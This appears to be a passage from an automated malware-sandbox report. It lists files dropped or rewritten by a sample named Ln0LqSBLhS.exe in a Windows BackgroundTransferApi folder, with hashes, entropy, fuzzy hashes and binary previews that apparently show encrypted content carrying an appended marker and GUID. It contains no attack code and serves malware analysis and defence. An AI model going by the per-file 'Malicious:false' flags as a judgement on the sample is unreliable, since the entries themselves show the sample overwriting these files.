                                                                                                                                                                                                    Preview: .......P.UU/.x.0SH....\S.....n..m.n=.b\j....:*=(.j.,...=qu..!.&.K.N.rvU.z..Zw...jJ2z.{M..e.e.n}..vx).B...].....H..`......Q...J1...%.._..9.,J...I(00~.Z.....q......j...V...m.0&....L.......V...G...n....w..-(+..u.;.a.-7mi..d ......fg.74i9.Q].a.....e..Hx.1{.Y.T.ROZ.6.N...#../GsV0.4...rq.'.*.....-.6....p/?..6.nV.8R.....<.g{.S.~.(.S.u.RmQ.MX.`w)...{r=...j.k.k../9.;..6.+.../T......h.W..Y@....M..\.kL....=...*[..R.}.&w\.H=...I..t8..XPI..Rkc2....1.....|...AT...7..*..#........c.'.2..\....c.+i,...-}...k...>.....%....=E3.0...f...yT...CwAH.3P.R.3....I....8L..K.......$.Ap...H..e}....N..jR1v.S.&..-.......M.nr&e....Yo-..[wDI.}.nD.=5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\5af1a931-b3d6-4882-a3e4-449c63f0722e.24a02022-6d28-4a25-8d94-901bc704fdf5.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1421
                                                                                                                                                                                                    Entropy (8bit):7.854909712425498
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:FdqI6KoRCR5vV6C3CGkHMxNneXVOS/uU0RqDpRNM6P/2X3sOXzbD:LqtMmHiAOS/l0MrMe2XlXnD
                                                                                                                                                                                                    MD5:F81C27818271CC312F072C4D8F209B7B
                                                                                                                                                                                                    SHA1:ADA07C57E841DD7E759A75975FE791E66823F5D9
                                                                                                                                                                                                    SHA-256:82A8AC1A0C5D6417C66B1481F470B292543145907E55B0887EA0CCF73A69B0C3
                                                                                                                                                                                                    SHA-512:955C55427EFC6E4CC27D13AF3F7E822AF39CFB599FBCF884EDEA91703701B674FB1E605082AE4EAA6330CD9840C2F0CE4D319646C64ADB4E1D7AE442F45EFDA9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..;..&.........b..bR.i...0.... p..+.e.7W..R...7.=h...m{.&.....p.<..~t....AF.>l.@.q .}.KO.......\M..:TD..n5....S.i.{.a..0.4.....~a.#-.X..2<...)....;..d<Q....N8...F.J.k.\...'/L..J...c.d|~[...../.x..+..rjJO.V.....8...7Q......7.5}:... ..F.*...&..>.P...g:).DIq.=.e8.".=4h.U"...1.UW^..4.o..$./...`..H+n.9..X.V.^m.9&...(...Sm.\o.Jb)+e..g.O.~0..|S.,....>...l.....dM.K{...3...Zw.^.Q.X.}5HYZ~...?P".j.Qy......5.iL...D.1.;1c.z.'.}.VY..1.|.;...t.R./..x..@..K.....'.;..)t.W.v..A.~n..$M9..e?.@..).2xV;../...1..cCf .V%hVL.(n.N..'"...r.+y[}q.....K..iK/.aY6Z.e..P.Q.o..-..t...0.....]...0Z....9..]bw.4a..8.]....K..W;%~...s..).z..r...ZPx...<.j.....5.....vr8.AZ..4H...../......I.&....a...2.1'w_`....I]..h.bYw..0...@..p.R.h.<.=../.w.h..........G,Gqyv..F.H..q..a...-.l..]1|......6y>..T,I.q..Hg...H.......!...(&F4...'....1v..G..v..b...&.. .......Ng..K..U..fS.x.H.....`......>.d.P.N.X......f[.M...j.[...?..^-..O=...K.J).N)....!.C2...>F..M..j....{..EN..2F...V..-.Hem.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\5af1a931-b3d6-4882-a3e4-449c63f0722e.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):737
                                                                                                                                                                                                    Entropy (8bit):7.660445441902404
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:EKO3UnsF7689k8H65f0TgyGIm6f4BLljvIhSrOR3sxOA2ulG+wwqgaHZh/kcii9a:9TsFL9PE9pIm4R3sxxl9rR4D/kbD
                                                                                                                                                                                                    MD5:B521D23AEA85C262595DE2CA474FF71D
                                                                                                                                                                                                    SHA1:D20144D0FC7A54D39108A9751B7BD10BFEA496EF
                                                                                                                                                                                                    SHA-256:745304880F46232051B488CF6D346DE7B489613063B818A4B7A5A4622F19458F
                                                                                                                                                                                                    SHA-512:D26FAAF2A1E10075146B7DAB1EA03FE7687AD407A7DAFA092D2CB25660555BC2873570B5BC661365DDB87E877A170614A9893180F8E9826BFB1C67846040DAE4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....3....L.6....p8V...I.v]....5.P~..Yx.>.}.!.c...cft!.........h..X3>e....b...:.|.m......I,...z..2.C.[...o..i.*.B.:...zH.[.@.n.....=.A.5...>{.G..T.5..{3..lbm.l|.X.t......D.8...8.q.1..X._.../.7.D..T.C..S.X......Lov.m...+M:.]T..Q.Z.?...;\z..c|..UOn.6&..a...>..'.....M|.....,x.K.2.n....U..[H.....Z.,..........6K.V....x..._.Lc..:Mb.i.X0....U...GG..........Klr...O:....e..q2..B>..\.M..w.HXI.....k...mbT.Co../.rA.G..+T.!......!...N.2.3._.6f.b ....R..=},....},.(5k'....e.......... ..\V|.R.......%.-.<.....:'...%...\.j...<...P.Eoi0s20..H..'i8c.8...b...h..!..^u[...l. \O.U.,d.p.y$LD..X.]d........a.<.J%>.s..,..>q...lZ=..Bz5.$.p]....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\5ee7e2fe-0cc1-4e86-af16-0c5ff65f0ea8.cac2a224-dee6-4615-bbb6-4676089616bc.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:huf output
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1427
                                                                                                                                                                                                    Entropy (8bit):7.828179370280232
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:vDkELqsAhQbRmYbyTbfryu4ltgBaUBLZyrdf1uo9SXLTXMbBMzGhRvcoCZI1fth2:vDfLQQb8v50gBaUBdyrp1uo98HzQ6oCb
                                                                                                                                                                                                    MD5:6C1F8B17137DE67B0F50815292DC5516
                                                                                                                                                                                                    SHA1:EDCE7438661976191E84529C852F458D00C0C376
                                                                                                                                                                                                    SHA-256:43C9A44748EA06E892FCF778DA507E2DB39E4C0DAF3731306482FEDD486E7934
                                                                                                                                                                                                    SHA-512:030A175767F416DCC68798D85BFD12833F09E7C389496E3CF492F30DC91A654D0BAE46A5D27A6052F54D7FDF7C18EDF6335819D5EAD9A75256B20E8397F4CD5E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ... ..VM.'.X..B.q..........}..8....[..O......6..u@.*.-.(..*!Q..l.....NN..l.o6..2.#wv...]Xx..egA..B..p&.."V4.'.z.\.C...9iQ.X..3[.R.rC.D...b.!..,....;'.R......[A..:s.z..u....(.?.|.G.VH...m..[=XJ.P....:..?L.Z...4.....G.U.!u.QZI..r.w..d....u..|V}.b......dQKc....:..&.Cw.(...!.......1WR\..6.I.J"...5SVk.:.y1........a..P.g.l....A..2e.....K..d.......^L;.pz..?.J6X.h:.#..../P..B....... ..iIm .=9&.....O.BDY.M.voY....)8..Dd... .[*.V..........Z.W...k.X.dH.f..T../....#...gM.M.gv5.R.B.F5...i;}m&@H....y.p.x...5.{.x..R...-3..R...<.zPa...<.QIDi..~.8............xR/1{#...6z....}'.op...D.U(.M..+...b...e..2...t....].v|$]..%%=5....R...T...>..?....9@-.R...T..&&..p.....s...>..w&.e../......,....<...[..Q...8..x.".........H....;6'?...'R'..X...*C.1oB........t_[...%.aHh}.Y..'k.....Y6J.2a.#.k$o..*.{........l\n.]g<...gs..Q.. .....@......]n......7.-<)4.~....W.).$mp...k9T.9..X....g....M....l.....kb.fw..0...NS......+._.Y....xO...?,&.B....._...#Z".....tj......s..;*.....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\5ee7e2fe-0cc1-4e86-af16-0c5ff65f0ea8.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):739
                                                                                                                                                                                                    Entropy (8bit):7.721856660441323
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:RHcfn8LrWt3r2nTcj1YA+50PuqJ6rYM98favOK+gRh9T3n6pDfUcii9a:1kQg3qAr+qWqHMOkORgRr36BUbD
                                                                                                                                                                                                    MD5:78D520F9676A0250D85096054D61E982
                                                                                                                                                                                                    SHA1:E549C696E2C8668DE54C6C0EC51DD1C240C277BF
                                                                                                                                                                                                    SHA-256:E955ADBF6D14418630B2D1E41E4716453EEEE8628340D42768D5490A3CAEACCD
                                                                                                                                                                                                    SHA-512:C9285F321460DA31496982F0F5A5FA0622530195991D36A862305BD8DD757374292297BC785B35D5D93C65E6C697FA35CB158660EC92329CC142CF0FF3777F70
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .Z.X.'...>m...Hr.T.....%T....2V...}.."ozPZn..~+...4..e.0..h..W.B.....X=..`...A...YhY....~.j.p.c....5.wD..q.....7_Rl.CtN./..i.F.56LC....0.+.....e..7V...3.%b...v...H...........0.*...].).y...;.l~....k. ..+..R~1>....^&...?..$J7.....Q..%..f...hI.+..nX.t..^.@P....t.N<b:+&-<.%p9U.\3. J....6.0R_.w{=zP..}8-.&.&t..t..c...._.hA...>-x.Z.n&jK.]f1....a.n....:J@..........F..g\.z...!.c.!...b@.-.av.....J.<.....|...i.f..W.2d./....M..z..(A0....}E.B....">C..sP.N.:Y m.0.....Da...&;...E|..uR[m.8...).Q.F.....<.-i....`og...+/.....z..~Du. e.fIb..)...J..r#.<..d.J.Mu....A.g.U:{U.....M..S^P....2..$P...qh@..\..4..+...}../.#...s....PJ\..03._....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\638ce68b-a765-4ccb-a6a0-4aaea0f267b2.85143aad-d39c-403f-a8dd-c6fb6ba5c68a.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1421
                                                                                                                                                                                                    Entropy (8bit):7.833965871692295
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:OwYf0qkJqVNe/eVmYBXBgkakvFUJyAbwxUMuolQM1igOyryae9A0vIsqnw5bD:OH8jqVM/ezhHFUvwx1d1iLraem0vow5D
                                                                                                                                                                                                    MD5:78D6AC59D2E35794EB3F273297AD5BA7
                                                                                                                                                                                                    SHA1:1B1A40C4511BAB42107BE64A09D9AA781F826AC5
                                                                                                                                                                                                    SHA-256:0691EE7479104D4B7A1EFE2A1A073AF409A1A8481885B19A603CBE07F0207FDA
                                                                                                                                                                                                    SHA-512:17A2482A16C8B31B1081049DB32847675DB9866ECC63F3E5252113FF3D801F006D191979F6AD22D30359F94A6B21A384E649496A6688225CAD34CD9EB2D05C13
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ].7...7L...*`.......}I...m.}....0YIlhe.`...R..eIg.O.9JX(..3.nv..............&S........w|s.L.I...-~....t~..@..+.......%i.!.ubX.C)..-=...A&..H>..F.^4PSV<.Y..."....P,y.-ap9...A.K!`...;..`...7..."..nyB.&........J.O.3..A.....h=.RaS..CB.{...r<..v..5n.....Jb.>wm.$Cd.".w.M..}...*.2...W......3.W.Q$o....VT..}MK.L.&..3.Qm.Q[.l..n....R.S13K..{..>....#..t..cs...aU.'&.w.8...$E@H...&.....^..i.......V4..-,;..)BcS.Kw...P..\..A.P..5..M..r..\.....Q..UO.ZZ.;....W.aMYB.y.v.h.3.z.r...lr..gF..../...,..o..0.|^inz_..m....;..W..)............Yj+....kr_. ..j.. C..I..<8..A.e..B.d.j.... A.).n~..XP.~f....=A..V...1.....p.*..x6@..z8eg .V.d..+K..]x>...%h.<.*......^.U<...>M_......L$;u.i.#Q.X.K3~......B....k..)...Q.|.q]f<.T.q.F@-..%.S.....v.u.b.Cr._0{xP{.....m.F .<..d. ..U.....'F.v..$n..wUb...A|k..X......6~..v..g.6..s.5....^.C.U..$2.....O..|.6...O...X.....2..nq..z%\...<.|B.6<.t .c...1Eh~.-[m.$eM..-.v.H,.a........k.;.....r"..)....U...s.....6..`,K~c%....Nbw...zKf......*....D
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\638ce68b-a765-4ccb-a6a0-4aaea0f267b2.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):737
                                                                                                                                                                                                    Entropy (8bit):7.661153085178662
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:AkGQB1lbr29uG24BwL6kG9jhmTyJx0/PhB85MvEJ5j/AVPcii9a:TGae9uGXBwLw9gB/JibJ9/AVPbD
                                                                                                                                                                                                    MD5:A96F7AF612B67D2C47F21A1B84473ACB
                                                                                                                                                                                                    SHA1:38CFD990DADA90B7A78922EC85232429082DC343
                                                                                                                                                                                                    SHA-256:3391C5F801C04E11A902650B4E8A3274E468759AC525A880E762E16A3D9F0746
                                                                                                                                                                                                    SHA-512:4BF4C8846834B6AC0CFB539D4F7011F3A38075353DF0876B2F5C9F29E3AE6B6E15FC12244DB1A067027928D01972AE08BC29317C8211216D7A021647683FAC53
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: `-.v(g=./Bj.w.H.fM...e..4..qV.n.....DT.gG.."CQ...R .?.......3[Qu..'.0Q..KT...J@.7.....d.Q..S#...5jT..P..K...w.{....~.\....G.i.dh.D...H.].0.j.....I]......}(u...;93u..w....%...w..S<.....c.iG[.0..G...C>>zH....|.^*bz.[T.B.....lUf.....;.>R.{X42...9..K./5u..0...k....iP.T.C.{H.P.X....Mt...'y=:.......].{.....8..r......I.]=p...?.....L....D.H..o...)......A.T..XL.IO.W.g.}.[.@d.#..D.-..5~=r..m...C....(.u.I6...#k...Je.z....,Z.......s(...P....R.........(.W..y..:RTE}.{9.G..,....j~....$;..5!..U!...H.b.s........J..j.+.z_.Uy..._...1.......\T.]....Zz..J.v..Q.~..C.....mo..T.. ...%...Z..d..S...s..Ak7.^..Fw"G_G9w... "&..&....S4.E..B.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\6be0d309-15fb-49d5-8b5f-c6a4bbdd3098.fcd524a3-7de7-4755-bbf9-781228c9480d.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1423
                                                                                                                                                                                                    Entropy (8bit):7.856566679158669
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:8UKaejBBY5lryQYooF0ADYhkx3K560fG6dO+ZFhX6miZOm1pnedoaXbD:GaejU5lLE0bheK560flHd6nOm1Qe+D
                                                                                                                                                                                                    MD5:E09EB9050F8EA4EE8DD5275716B30F00
                                                                                                                                                                                                    SHA1:865BDF968C366872CF0E81DFBD93138AB8B86A5C
                                                                                                                                                                                                    SHA-256:85756E048545AE0BAC3050A646AEE318C9C124C221CF9E57A93C360905152C3E
                                                                                                                                                                                                    SHA-512:A211D1DA38B73ED2AE4CE1DE71DA4106E8664F62D9947067939AEF0D548F96BBA79721B93BD40585A0DB9B0E4CDA15E1C968981E157ACDF9D05260DDDD8E066F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .}nI=.p..`....!5{......d...3|.i.:.g...wl.DG.Y..Ge?.........}Xe....8.=./9..Hu....z.F.....H....5.B.V..bIz...^..<,R..^..j..|../f.......-....X..X...I..].#H..........!.[...C.E...A..j.mM.V ..B(..H....+S.W...<2D..'.....k........0...`Y.Aw.c.}.</.&.xiq...V.x..@......&.Ol..p...F`......y.?..D...%.:.jn.....'\...--P.....-NMnqp.[-.W...x..!..;.....?.A3h.[b..&.......j.Yu.N.......s...a..{.O...>.Zi..X.n.....3h..<)6...../........@.2.T.K.!...x...L..|b.S.Q....(.qL..bQ.&..nNk.$....:YA../J.....&.[.!..+..mk.a....}a...SQ.T....4..^.i.Xv.r.,>$.......p.R...mT#.."(...-VO....9.\4J..#6.CV..3.H......V.@..y.D......*.>.\.-...v.9\...*R.l......../L.....`...zv[..f{...*..k.H.)..+f.e.xs<.kf.h;(/0..C....)...#c=......X.AOMd..q9..F.&g......Xb.._.U.y....H*...\.Y..^.......h.^Q.".G...(...O.....R....8I......A.K..[......`!.RUEJ....:Nz......pZ4p.=9...........w-$..%...as..]...e....\..~%o....x..,R..r`2Yg..T..R...j.v8..S;.z.P.@3..d.q.qh.2.2.g.o......s..)X...J..`0.?.2XY.e^.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\6be0d309-15fb-49d5-8b5f-c6a4bbdd3098.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):739
                                                                                                                                                                                                    Entropy (8bit):7.682679621675059
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:UxMQYwpm3ez/Vidm6Uqay73x73EguIHfXDgTA8GUYlE9eARRd/mHu7MX1doRngcq:UxUuz/VgUqn93E8/XDgTtDIE9pRfYX1t
                                                                                                                                                                                                    MD5:A8FE48A8215C75489CE1DCD22B2B031F
                                                                                                                                                                                                    SHA1:8B1F7BF13C0BA5F6851A628D5550F57B04DF839B
                                                                                                                                                                                                    SHA-256:13F327C09C83934EAE6B6C270D408221B2823E8BF2144874BB67177127345E87
                                                                                                                                                                                                    SHA-512:2D698D808786A379814889EDE99A3CA3CC120A11CB2AF8F7220EF63B80AC9D15CBB586F66FA7486E96362A0A1699F0C492EEFC618BECB1535F087AA16F794420
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .+.?.$...W....m.....&...>./...@.K.....N.OO(..e....Y.(.j...7..k`X........0.x.k.=[.[.G.@.^L.3.m:....-g....8.D.dn......Z..2w.oF.F).|.....N.y.C".'?..~..n.... ..V.^..4&..y...J..K....$p.. ......Y&.l...|...H..}..d....=..i.#.\.,.3...`.=L.@.9...f.......J.(,.,...E..$...wD...I"..gG.p3u N....[[.>.Tm6.2....~.k..;..|.5.!...L..........{&.,.7.Q..?.@r$.... .`.....i....mb7..J.....1...IR.}..N/..|.&.<.Go4h.J.J.@$..h...+.`.S.B.es......TB....fom...%.]).....Kdj....B..R.....4.9.T...S..... ,s[.p.T..6.h.,.e.)).../.kv.n..6P.M1...'.#+l-..U......J..9....G..S..5dP..8...zui{r......o..F...`....8....5._.I.........%...;,B..*T.c...{....P{.6.o.kl.;8q...e7....+5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\6fe193b8-449c-40c5-a52a-962d85a5e2a5.2bd3618d-9075-4eea-81e9-3b5345294dd9.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1419
                                                                                                                                                                                                    Entropy (8bit):7.840913904321933
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:sKgzhIDNTYiiDR96WmVSFdlJ7fHIiVHHEOn1TwRhHAUsqQKsgzn97bD:sxhMNTY16WL3VHHEoSyPqQKsgz9/D
                                                                                                                                                                                                    MD5:EBBAB1E2C2BFBEC866168BB93B6287DB
                                                                                                                                                                                                    SHA1:37F7808C570A39C8BB2C00829F7A8F65AE755D8A
                                                                                                                                                                                                    SHA-256:DFA505D271C89BEDBCCD1FE75CF68AB2330257AE815F033F6A57570FB208945F
                                                                                                                                                                                                    SHA-512:5849DEEE6A49E04E510B871813C3A85FC637F3631CB935D8136F28164787F27B697818B891F4D0A073AECDFDEDAD2C3B503534F3937D4C269B47872778E7E09F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .......SP..3.?.........Lm.LB..H...."..|.n..+B.wK.!.O.....{..b.I)..we>..R-.@&..!b|_r..Z>.e..8.]...|;...T. f..8Q.......B..:.~..f.../aTp.'...Ur..R....3...B%W}..(C0J.tZ8k...zP.....s.J(..............P....kI,.K....F.n."..b.. .t;.#|?.i..Q.W..)...G$x/..X78zs..s@...2.,.h_b...QG....r.z.....i.t{..<~....\..c.+..f...8.%QP-..1.RA..N9C].w.........l..ht.....V...O....Q4..p....;e......b..^.0_j.w..=f...x..,.j5.....8%.V...Rj<%.._..({.U....(.7u.R.l.9@n..:(W..=....[~.2.8..._e...... .qM..j...Xif)H.7...~<h{..=.R.p.....0.2l.f..^<?..I....NK.".Z.N.+.+X..6..+.I..xw8.D...6,.j`...>...1..S..{.............[.[.&../.>.I%>.;=.+8..'./.{.!..(..|.......,.R..y..*y.jx...<'..6......W.........PL..?-..j=..;..}..f...{...W..+8.m4@.oT...}..]Ej.Q@...%{.....'~.l.K2.....L......G.X...Q...94I..3...3..8..&..8.i<...@.k:.:I....%.[5kATW......... ID.R.~y.+@U..[..&...;..bq......cHq.v..(.~.R.).6c...u...~..;"3...$_..<....-.o1..y......../.....Kjze..... U..g.{@.....a.S_.{...}dj.....'Df..Z.5.yN..m.e.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\6fe193b8-449c-40c5-a52a-962d85a5e2a5.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):735
                                                                                                                                                                                                    Entropy (8bit):7.670213885110699
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:8a/uYM4RbGl5jjJkTVo8AidETEQk6u58JykSBDXkF86/bugT4cii9a:8a/uUNGvuTVo8AiKT7u58NSy8ybu7bD
                                                                                                                                                                                                    MD5:B8D60BF3C8D48F3DF43B27C70975026D
                                                                                                                                                                                                    SHA1:9768C09A7863E7A18F3873D0D67A5524C548D14B
                                                                                                                                                                                                    SHA-256:11C0F7A75A547FD47BBFD6F532FAB3F72DDDF8FAC0B7387273A53EB387E210E9
                                                                                                                                                                                                    SHA-512:7D01770E2955606365529A1907ABF200F70A0DDB47EDDA68171FAFE6FF2761FD2447C1119A316815BBB68C595169D2E1728DF543AAFE010ADBF309C7E34802CB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....U;..v."...........q.<Nu..C,.9.<...T.. .......9~;..J.m.}:ca..-N...T....O..........BH..6'_.....b..?..............~m...Yi......G..Z..rs.......(.._ ..;./.#...J/.N...5....9o..p))..h..6Z./C..{..zEu..bv...8.S.P.P....rJZ....]...w\+z..H..._...)...e..JG..~0wr~....o.|&|....6.2..p/.&..z..v}.&S-.x.l..6,1.%B..S.l.....".".|t.v....a.....+=y0..V..r.IzV@4.-Z.C...&&.T.J.......-..2.X.s.....a.~.,.|..NE..A......7.....%i.]..G.......@.x'w:...]s.-....".\dT..0..7@*H.q0..{.O.X.*=J....?...A...D6...v...{v...2{.E...D.J:..e...h.%CP~.#...qu...5..2x...e.0.......j............r....q.~k.A.....#.Y.z.sS...W..S#.D&$.KU.+ .s=.Dj.O..REr...P.y.i..r..7 .5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\75a55ca9-4897-475c-8f15-18ba62f37181.318c8cd5-4871-4e45-b0d0-f723a4711df1.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1423
                                                                                                                                                                                                    Entropy (8bit):7.838018968195814
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:0BUMZXAU7MyQdJ+zRNanoBgyPry70SpClr2zmznrPXZo2yCJ7UmeSmZhqTnAwTBX:SZXAU6qPaoBVDK46zmz1EGTnAwTRD
                                                                                                                                                                                                    MD5:EEEEBA7B6C24A285B09625B51275DE6B
                                                                                                                                                                                                    SHA1:25156A32C6361626418906A0E74574AB03F843D3
                                                                                                                                                                                                    SHA-256:C0E16248AE150548597098268A6B49C1A8645EB954551E3B6C8692073876A922
                                                                                                                                                                                                    SHA-512:E08BBEC4BFAB07B1D034E07070166171BD0624935EFB7C3CA9AF704255A5A573BCBB3AB02B23281DEBA20B0864F9B800CE50FEC8C1196570BDA85F2F04466AFA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: -.....).tkE(....a....q}6....;.r.f.jF.<7k.....X...1.r.../:&{*G]%...5.".K......l.u......e?..h?^..G........I..,o..9.C...X..nj.#;......%<..|."..'...b..B0:......Bo..Z..x..Z.O.'G..1....8.,.{..$......A.KBa?j.e...q....o.jc)zOl....Mi...j.4.+.,....?....Q.,_|..cG._..$.."g.=..5).L.W.........f3..8.t...'1.1-...j.@.@..^......@..H>0..t L".T...=..O.U...-.&..n...zot....@._...:...'#X..q.....e*/.g.u.5O..%.....t..G.(I<...O..&....te.x....!)....dY..'.W.O.B$...d..X.........<.......Q......>q.......6.....fA|~^X.{QC..L.@....H..7...Z.Y~.:s.0..}+.)Wn......uX..QF.4.Q..p..._T.v...N..&'.x.`u.o}...,na%'22..k.y,.I._x#.....^*.E..+X,O....9. ..G.`.O.|.(}....!.n....k....|..I....zg..../.....H...^.3.gz8......&....G./.~'...u....UQy2RW.;...}..D:l...w.x.7.....U.......V,_$_TL..n`..N]...k2...1$}.:....Z>. ...E..x....'.:.Z...l.....?......q`..3.....I.mW...?..~,bep.\..5...P.V..W.G...........8....g^.i.9..)..m;....8M...(I.QWt..1....B..!..?..n..o..]ng.gm.....5I..C.?8v.A..3"....4I.`..._.&e....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\75a55ca9-4897-475c-8f15-18ba62f37181.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):737
                                                                                                                                                                                                    Entropy (8bit):7.723756837536078
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:l8kw+t8jof0fGSm2KKh1CM06y6UjcghK9mm4W7P9rAXjf7jEL7cii9a:6kwi8jCqpauHghK9mmMfEL7bD
                                                                                                                                                                                                    MD5:D2FFB646D074E080454AEB085E44212C
                                                                                                                                                                                                    SHA1:5D5C3551D70AA9A1C070534CF18353F925F89BDB
                                                                                                                                                                                                    SHA-256:2FD04F1AC6F9D5D9CA66181BF292146C50D08468B5F6FEFFDB4A396D1C1ACB12
